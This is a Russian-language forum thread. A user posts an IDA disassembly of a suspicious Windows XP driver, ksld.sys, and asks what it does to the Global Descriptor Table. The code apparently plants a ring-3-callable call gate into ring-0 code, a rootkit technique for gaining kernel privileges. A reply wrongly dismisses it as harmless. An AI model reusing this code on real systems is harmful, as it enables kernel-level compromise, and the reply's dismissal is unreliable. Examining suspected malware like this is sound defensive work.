OS: winxp sp2 что он такое делает с глобальной дескрипторной таблицой? подхватил на каком-то китайском сайте... ; ; ================================================================== ; This file is generated by The Interactive Disassembler (IDA) ; ================================================================== ; ; File Name : C:\WINDOWS\system32\drivers\ksld.sys ; Format : Portable executable for 80386 (PE) ; Imagebase : 10000 ; Section 1. (virtual address 00000200) ; Virtual size : 00000049 ( 73.) ; Section size in file : 00000060 ( 96.) ; Offset to raw data for section: 00000200 ; Flags 68000020: Text Not pageable Executable Readable ; Alignment : default .686p .mmx .model flat ; ================================================================== ; Segment type: Pure code ; Segment permissions: Read/Execute _text segment para public 'CODE' use32 assume cs:_text ;org 10200h assume es:nothing, ss:nothing, ds:_text, fs:nothing, gs:nothing ; --------------- S U B R O U T I N E --------------------------------------- ; Attributes: bp-based frame public start start proc near var_2A = qword ptr -2Ah push ebp mov ebp, esp nop nop nop nop pushf pusha push edx sgdt [esp+28h+var_2A] pop edx mov eax, edx mov ecx, 3E0h mov byte ptr [edx], 0C3h mov [ecx+edx], ax shr eax, 10h mov [ecx+edx+6], ax mov dword ptr [ecx+edx+2], 0EC0003E8h mov dword ptr [ecx+edx+8], 0FFFFh mov dword ptr [ecx+edx+0Ch], 0CF9A00h popa popf mov eax, 0 leave retn 8 start endp ; --------------------------------------------------------------------------- align 20h _text ends end start
Странно как-то, вроде ничего не делает - сохранил таблицу и модифицировал ее копию... Выложи сам файл. Интересно взглянуть
